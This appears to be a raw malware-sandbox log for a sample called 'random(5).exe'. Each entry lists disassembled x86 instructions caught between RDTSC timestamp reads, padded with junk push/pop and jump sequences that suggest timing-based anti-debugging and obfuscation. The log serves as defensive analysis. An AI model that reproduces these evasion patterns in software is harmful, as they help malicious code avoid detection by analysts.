    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E904C8 second address: 6E90559 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a jmp 00007F519CFC89C7h 0x0000000f test esi, esi 0x00000011 jmp 00007F519CFC89C6h 0x00000016 je 00007F520C377B5Dh 0x0000001c jmp 00007F519CFC89C0h 0x00000021 sub eax, eax 0x00000023 pushad 0x00000024 call 00007F519CFC89C7h 0x00000029 pushad 0x0000002a popad 0x0000002b pop ecx 0x0000002c mov bx, 432Ah 0x00000030 popad 0x00000031 mov dword ptr [esi], edi 0x00000033 jmp 00007F519CFC89C1h 0x00000038 mov dword ptr [esi+04h], eax 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e mov ebx, 7729787Eh 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90559 second address: 6E9055E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E9055E second address: 6E90581 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, bx 0x00000006 mov cx, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esi+08h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F519CFC89C2h 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90581 second address: 6E90628 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F519CD4C381h 0x00000009 xor ch, 00000066h 0x0000000c jmp 00007F519CD4C381h 0x00000011 popfd 0x00000012 call 00007F519CD4C380h 0x00000017 pop ecx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov dword ptr [esi+0Ch], eax 0x0000001e jmp 00007F519CD4C381h 0x00000023 mov eax, dword ptr [ebx+4Ch] 0x00000026 jmp 00007F519CD4C37Eh 0x0000002b mov dword ptr [esi+10h], eax 0x0000002e pushad 0x0000002f call 00007F519CD4C37Eh 0x00000034 mov esi, 5EA562F1h 0x00000039 pop eax 0x0000003a movsx edx, si 0x0000003d popad 0x0000003e mov eax, dword ptr [ebx+50h] 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 pushfd 0x00000045 jmp 00007F519CD4C382h 0x0000004a or ch, FFFFFFF8h 0x0000004d jmp 00007F519CD4C37Bh 0x00000052 popfd 0x00000053 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90628 second address: 6E9069A instructions: 0x00000000 rdtsc 0x00000002 mov ah, BAh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dl, 2Ch 0x00000008 popad 0x00000009 mov dword ptr [esi+14h], eax 0x0000000c jmp 00007F519CFC89BCh 0x00000011 mov eax, dword ptr [ebx+54h] 0x00000014 pushad 0x00000015 call 00007F519CFC89BEh 0x0000001a mov edi, ecx 0x0000001c pop eax 0x0000001d call 00007F519CFC89C7h 0x00000022 pushad 0x00000023 popad 0x00000024 pop eax 0x00000025 popad 0x00000026 mov dword ptr [esi+18h], eax 0x00000029 jmp 00007F519CFC89C5h 0x0000002e mov eax, dword ptr [ebx+58h] 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F519CFC89BDh 0x00000038 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E9069A second address: 6E906AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F519CD4C37Ch 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E906AA second address: 6E906AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E906AE second address: 6E906C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+1Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F519CD4C37Ah 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E906C5 second address: 6E906CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E906CB second address: 6E906CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E906CF second address: 6E906E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+5Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F519CFC89BBh 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E906E9 second address: 6E90706 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C389h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90706 second address: 6E90775 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F519CFC89C7h 0x00000009 sub esi, 1144D8FEh 0x0000000f jmp 00007F519CFC89C9h 0x00000014 popfd 0x00000015 call 00007F519CFC89C0h 0x0000001a pop ecx 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov dword ptr [esi+20h], eax 0x00000021 jmp 00007F519CFC89C1h 0x00000026 mov eax, dword ptr [ebx+60h] 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov ebx, 7B7AB3BEh 0x00000031 popad 0x00000032 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90775 second address: 6E9077B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E9077B second address: 6E9077F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E9077F second address: 6E90783 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90783 second address: 6E90794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+24h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90794 second address: 6E90798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90798 second address: 6E9079E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E9079E second address: 6E907B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+64h] 0x0000000c pushad 0x0000000d mov si, 5ECDh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E907B7 second address: 6E907FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, 9A85h 0x00000008 popad 0x00000009 popad 0x0000000a mov dword ptr [esi+28h], eax 0x0000000d jmp 00007F519CFC89C0h 0x00000012 mov eax, dword ptr [ebx+68h] 0x00000015 pushad 0x00000016 popad 0x00000017 mov dword ptr [esi+2Ch], eax 0x0000001a pushad 0x0000001b mov ebx, ecx 0x0000001d popad 0x0000001e mov ax, word ptr [ebx+6Ch] 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F519CFC89C9h 0x00000029 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E907FF second address: 6E90834 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 7FF2h 0x00000007 mov ebx, 5AD0A93Eh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov word ptr [esi+30h], ax 0x00000013 jmp 00007F519CD4C385h 0x00000018 mov ax, word ptr [ebx+00000088h] 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90834 second address: 6E90838 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90838 second address: 6E9083E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E9083E second address: 6E90873 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F519CFC89C0h 0x00000009 add ch, 00000068h 0x0000000c jmp 00007F519CFC89BBh 0x00000011 popfd 0x00000012 push ecx 0x00000013 pop edx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov word ptr [esi+32h], ax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov dx, E862h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90873 second address: 6E90878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90878 second address: 6E908AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F519CFC89C4h 0x00000008 push ecx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [ebx+0000008Ch] 0x00000013 jmp 00007F519CFC89BCh 0x00000018 mov dword ptr [esi+34h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov ah, bh 0x00000020 popad 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E908AF second address: 6E908C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F519CD4C37Eh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E908C1 second address: 6E9091B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+18h] 0x0000000b jmp 00007F519CFC89C7h 0x00000010 mov dword ptr [esi+38h], eax 0x00000013 pushad 0x00000014 jmp 00007F519CFC89C4h 0x00000019 jmp 00007F519CFC89C2h 0x0000001e popad 0x0000001f mov eax, dword ptr [ebx+1Ch] 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 mov di, A960h 0x00000029 mov eax, edx 0x0000002b popad 0x0000002c rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E9091B second address: 6E90930 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F519CD4C381h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90930 second address: 6E90974 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+3Ch], eax 0x0000000e jmp 00007F519CFC89BEh 0x00000013 mov eax, dword ptr [ebx+20h] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F519CFC89C7h 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90974 second address: 6E90A43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 mov dh, A1h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+40h], eax 0x0000000e pushad 0x0000000f movzx ecx, di 0x00000012 jmp 00007F519CD4C385h 0x00000017 popad 0x00000018 lea eax, dword ptr [ebx+00000080h] 0x0000001e pushad 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F519CD4C389h 0x00000026 add ecx, 7E16E3E6h 0x0000002c jmp 00007F519CD4C381h 0x00000031 popfd 0x00000032 popad 0x00000033 mov ah, CEh 0x00000035 popad 0x00000036 push 00000001h 0x00000038 pushad 0x00000039 pushfd 0x0000003a jmp 00007F519CD4C389h 0x0000003f sub eax, 787293F6h 0x00000045 jmp 00007F519CD4C381h 0x0000004a popfd 0x0000004b push ecx 0x0000004c mov esi, ebx 0x0000004e pop edx 0x0000004f popad 0x00000050 nop 0x00000051 pushad 0x00000052 movzx eax, dx 0x00000055 jmp 00007F519CD4C381h 0x0000005a popad 0x0000005b push eax 0x0000005c jmp 00007F519CD4C381h 0x00000061 nop 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90A43 second address: 6E90A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90A47 second address: 6E90A5F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov cx, 26CBh 0x0000000a popad 0x0000000b lea eax, dword ptr [ebp-10h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov bx, 7F3Eh 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90A5F second address: 6E90A99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F519CFC89C0h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F519CFC89BCh 0x00000018 mov ah, F3h 0x0000001a popad 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90B07 second address: 6E90B30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b pushad 0x0000000c pushad 0x0000000d mov dx, cx 0x00000010 mov ebx, esi 0x00000012 popad 0x00000013 mov di, ax 0x00000016 popad 0x00000017 js 00007F520C0FAF15h 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90B30 second address: 6E90B36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90B36 second address: 6E90B3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90B3C second address: 6E90B5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp-0Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90B5D second address: 6E90B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90B61 second address: 6E90B67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90B67 second address: 6E90BA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop ebx 0x00000005 mov esi, 1627B58Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esi+04h], eax 0x00000010 pushad 0x00000011 mov esi, 7D1B0945h 0x00000016 mov dx, si 0x00000019 popad 0x0000001a lea eax, dword ptr [ebx+78h] 0x0000001d pushad 0x0000001e call 00007F519CD4C389h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90BA0 second address: 6E90BDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push 00000001h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F519CFC89C6h 0x00000011 jmp 00007F519CFC89C5h 0x00000016 popfd 0x00000017 mov edi, ecx 0x00000019 popad 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90BDB second address: 6E90C8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F519CD4C37Ch 0x00000011 and ax, F3F8h 0x00000016 jmp 00007F519CD4C37Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F519CD4C388h 0x00000022 jmp 00007F519CD4C385h 0x00000027 popfd 0x00000028 popad 0x00000029 push eax 0x0000002a jmp 00007F519CD4C381h 0x0000002f nop 0x00000030 jmp 00007F519CD4C37Eh 0x00000035 lea eax, dword ptr [ebp-08h] 0x00000038 jmp 00007F519CD4C380h 0x0000003d nop 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F519CD4C387h 0x00000045 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90D2D second address: 6E90D31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90D31 second address: 6E90D4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C389h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90D4E second address: 6E90E37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+70h] 0x0000000c jmp 00007F519CFC89BEh 0x00000011 push 00000001h 0x00000013 jmp 00007F519CFC89C0h 0x00000018 nop 0x00000019 pushad 0x0000001a mov cx, F83Dh 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F519CFC89C8h 0x00000025 jmp 00007F519CFC89C5h 0x0000002a popfd 0x0000002b call 00007F519CFC89C0h 0x00000030 pop eax 0x00000031 popad 0x00000032 popad 0x00000033 push eax 0x00000034 jmp 00007F519CFC89C0h 0x00000039 nop 0x0000003a pushad 0x0000003b pushfd 0x0000003c jmp 00007F519CFC89BEh 0x00000041 xor cx, 7A08h 0x00000046 jmp 00007F519CFC89BBh 0x0000004b popfd 0x0000004c pushfd 0x0000004d jmp 00007F519CFC89C8h 0x00000052 and esi, 28649C68h 0x00000058 jmp 00007F519CFC89BBh 0x0000005d popfd 0x0000005e popad 0x0000005f lea eax, dword ptr [ebp-18h] 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90E37 second address: 6E90E3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90E3B second address: 6E90E41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90EEA second address: 6E90EEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90EEE second address: 6E90EF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90EF2 second address: 6E90EF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90EF8 second address: 6E90EFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90EFE second address: 6E90F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90F02 second address: 6E90F06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90F06 second address: 6E90F5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp-14h] 0x0000000b pushad 0x0000000c mov ax, 22CBh 0x00000010 pushfd 0x00000011 jmp 00007F519CD4C380h 0x00000016 xor ax, 3DD8h 0x0000001b jmp 00007F519CD4C37Bh 0x00000020 popfd 0x00000021 popad 0x00000022 mov ecx, esi 0x00000024 pushad 0x00000025 mov bl, ah 0x00000027 mov edx, 1328B1B4h 0x0000002c popad 0x0000002d mov dword ptr [esi+0Ch], eax 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F519CD4C386h 0x00000037 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90F5F second address: 6E90F9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F519CFC89C1h 0x00000008 pop esi 0x00000009 mov ah, bh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov edx, 762C06ECh 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 call 00007F519CFC89C5h 0x0000001b pop eax 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90F9A second address: 6E90FB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F519CD4C383h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90FB1 second address: 6E90FB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90FB5 second address: 6E90FC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90FC8 second address: 6E90FCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90FCC second address: 6E90FD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90FD2 second address: 6E91013 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, ch 0x00000005 pushfd 0x00000006 jmp 00007F519CFC89C1h 0x0000000b adc cl, FFFFFFF6h 0x0000000e jmp 00007F519CFC89C1h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 lock cmpxchg dword ptr [edx], ecx 0x0000001b pushad 0x0000001c mov edx, esi 0x0000001e movzx eax, dx 0x00000021 popad 0x00000022 pop edi 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E91013 second address: 6E9102F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C388h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E9102F second address: 6E91035 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E91035 second address: 6E91039 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E91039 second address: 6E91059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F519CFC89C4h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E91059 second address: 6E91074 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F520C0FA9EAh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E91074 second address: 6E91078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E91078 second address: 6E9107C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E9107C second address: 6E91082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
